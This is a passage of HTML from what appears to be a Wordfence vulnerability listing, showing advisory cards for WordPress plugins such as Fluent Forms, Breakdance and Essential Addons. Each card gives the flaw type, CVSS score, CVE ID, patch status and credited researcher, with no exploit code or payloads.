					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-7436" target="_blank" rel="noopener noreferrer">							CVE-2026-7436						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpc-badge-management" target="_blank" rel="noopener">WPC Badge Management for WooCommerce</a> <span class="wfvr-software-slug">[wpc-badge-management]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4c2bd6964b38518385c4e8d1791fd762.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c2bd6964b38518385c4e8d1791fd762"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener">zaim</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/588e12c4-7d68-40ac-82bc-aacc5d389dee" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60fd38f8-e864-4011-b9f9-b3fef6551175" target="_blank" rel="noopener">WPML Multilingual &amp; Multicurrency for WooCommerce &lt;= 5.5.6 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66711" target="_blank" rel="noopener noreferrer">							CVE-2026-66711						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-multilingual" target="_blank" rel="noopener">WPML Multilingual &amp; Multicurrency for WooCommerce</a> <span class="wfvr-software-slug">[woocommerce-multilingual]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/coopernicus" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1ca6e24c1152dfd748d1d9f882bdced9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1ca6e24c1152dfd748d1d9f882bdced9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/coopernicus" target="_blank" rel="noopener">Coopernicus</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60fd38f8-e864-4011-b9f9-b3fef6551175" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/547008fe-2585-4089-a710-71a83ae3d829" target="_blank" rel="noopener">Fluent Forms &lt;= 6.2.8 &#8211; Reflected Cross-Site Scripting via &#8216;param&#8217;</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17571" target="_blank" rel="noopener noreferrer">							CVE-2026-17571						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentform" target="_blank" rel="noopener">Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder</a> <span class="wfvr-software-slug">[fluentform]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/547008fe-2585-4089-a710-71a83ae3d829" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/afb58149-cff0-4911-8322-c608fc00adf4" target="_blank" rel="noopener">GEO Plugin by Squirrly SEO &lt;= 14.1.1 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66664" target="_blank" rel="noopener noreferrer">							CVE-2026-66664						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/squirrly-seo" target="_blank" rel="noopener">GEO Plugin by Squirrly SEO</a> <span class="wfvr-software-slug">[squirrly-seo]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/afb58149-cff0-4911-8322-c608fc00adf4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/97c21d5a-9140-4e97-b166-531d243b084d" target="_blank" rel="noopener">Link Library &lt; 7.9.4 &#8211; Reflected Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18197" target="_blank" rel="noopener noreferrer">							CVE-2026-18197						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/link-library" target="_blank" rel="noopener">Link Library</a> <span class="wfvr-software-slug">[link-library]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joshua-martinelle" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joshua-martinelle" target="_blank" rel="noopener">Joshua Martinelle</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/97c21d5a-9140-4e97-b166-531d243b084d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c7370cbc-f681-49d7-9330-762443202529" target="_blank" rel="noopener">Responsive Thumbnail Slider &lt; 1.1.53 &#8211; Reflected Cross-Site Scripting via &#8216;id&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.1</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.1 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18344" target="_blank" rel="noopener noreferrer">							CVE-2026-18344						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-responsive-thumbnail-slider" target="_blank" rel="noopener">Responsive Thumbnail Slider</a> <span class="wfvr-software-slug">[wp-responsive-thumbnail-slider]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c7370cbc-f681-49d7-9330-762443202529" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0d9ba01b-09ae-4d35-8bec-30e7673c2a20" target="_blank" rel="noopener">Ad Invalid Click Protector (AICP) &lt;= 1.3.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65445" target="_blank" rel="noopener noreferrer">							CVE-2026-65445						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ad-invalid-click-protector" target="_blank" rel="noopener">Ad Invalid Click Protector (AICP)</a> <span class="wfvr-software-slug">[ad-invalid-click-protector]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0d9ba01b-09ae-4d35-8bec-30e7673c2a20" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8feabfb4-d094-467e-a1b7-266631a04c2f" target="_blank" rel="noopener">Bit Form – Contact Form, Payment Forms, Multi Step Forms, Calculator &amp; Custom Form Builder &lt; 3.1.2 &#8211; Missing Authorization to Unauthenticated Unauthorized Form Submission</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15054" target="_blank" rel="noopener noreferrer">							CVE-2026-15054						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bit-form" target="_blank" rel="noopener">Bit Form – Contact Form, Payment Forms, Multi Step Forms, Calculator &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[bit-form]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7ca13d60571fa21c6a24a25447a74480.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7ca13d60571fa21c6a24a25447a74480"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/charles-vosburgh" target="_blank" rel="noopener">Charles Vosburgh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8feabfb4-d094-467e-a1b7-266631a04c2f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/815a8764-9004-4cd7-9558-6ce0f804c936" target="_blank" rel="noopener">BOX NOW Delivery Croatia &lt;= 3.3.0 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65504" target="_blank" rel="noopener noreferrer">							CVE-2026-65504						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/box-now-delivery-croatia" target="_blank" rel="noopener">BOX NOW Delivery Croatia + Slovenia</a> <span class="wfvr-software-slug">[box-now-delivery-croatia]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/815a8764-9004-4cd7-9558-6ce0f804c936" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c9e09c6a-7d71-4c82-bc7a-ac310f52b5cd" target="_blank" rel="noopener">Breakdance &lt;= 2.6.1 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65551" target="_blank" rel="noopener noreferrer">							CVE-2026-65551						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/breakdance" target="_blank" rel="noopener">Breakdance</a> <span class="wfvr-software-slug">[breakdance]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/343456e443c863409724aa97bcfa6e3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="343456e443c863409724aa97bcfa6e3e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener">johska</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c9e09c6a-7d71-4c82-bc7a-ac310f52b5cd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/874c1ba5-1bbd-43ac-bc5c-901638fa56ef" target="_blank" rel="noopener">Database Collation Fix &lt;= 1.2.10 &#8211; Unauthenticated SQL Injection via &#8216;force-collation-algorithm&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15018" target="_blank" rel="noopener noreferrer">							CVE-2026-15018						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/database-collation-fix" target="_blank" rel="noopener">Database Collation Fix</a> <span class="wfvr-software-slug">[database-collation-fix]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/874c1ba5-1bbd-43ac-bc5c-901638fa56ef" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/61ee1857-aa85-4d37-a347-a1f59c95cbff" target="_blank" rel="noopener">Demi &lt;= 0.0.8 &#8211; Unauthenticated Information Exposure to Arbitrary Directory Copy</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15012" target="_blank" rel="noopener noreferrer">							CVE-2026-15012						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/demi-backup-migration" target="_blank" rel="noopener">Demi – One Click Demo Import, Backup &amp; Site Migration</a> <span class="wfvr-software-slug">[demi-backup-migration]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sahraoui-aymen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3f87b1e29a7dffa171d90f689dfa86c7.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3f87b1e29a7dffa171d90f689dfa86c7"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sahraoui-aymen" target="_blank" rel="noopener">SAHRAOUI AYMEN</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/61ee1857-aa85-4d37-a347-a1f59c95cbff" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6054e4fe-b10e-4c63-877d-05d6662a9251" target="_blank" rel="noopener">Element Pack Addons for Elementor – Elementor Widgets, Elementor Templates, Elementor Addons &lt;= 8.7.13 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65502" target="_blank" rel="noopener noreferrer">							CVE-2026-65502						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bdthemes-element-pack-lite" target="_blank" rel="noopener">Element Pack Addons for Elementor – Elementor Widgets, Elementor Templates, Elementor Addons</a> <span class="wfvr-software-slug">[bdthemes-element-pack-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/343456e443c863409724aa97bcfa6e3e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="343456e443c863409724aa97bcfa6e3e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/johska" target="_blank" rel="noopener">johska</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6054e4fe-b10e-4c63-877d-05d6662a9251" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f38e5f0-6c62-4c0a-99f9-09bc20ee87d4" target="_blank" rel="noopener">Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets &lt; 6.6.10 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13345" target="_blank" rel="noopener noreferrer">							CVE-2026-13345						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-addons-for-elementor-lite" target="_blank" rel="noopener">Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets</a> <span class="wfvr-software-slug">[essential-addons-for-elementor-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f38e5f0-6c62-4c0a-99f9-09bc20ee87d4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1754293e-ed27-4b5e-92f3-aea23127e0bc" target="_blank" rel="noopener">Exclusive Addons Elementor &lt;= 2.8.0 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
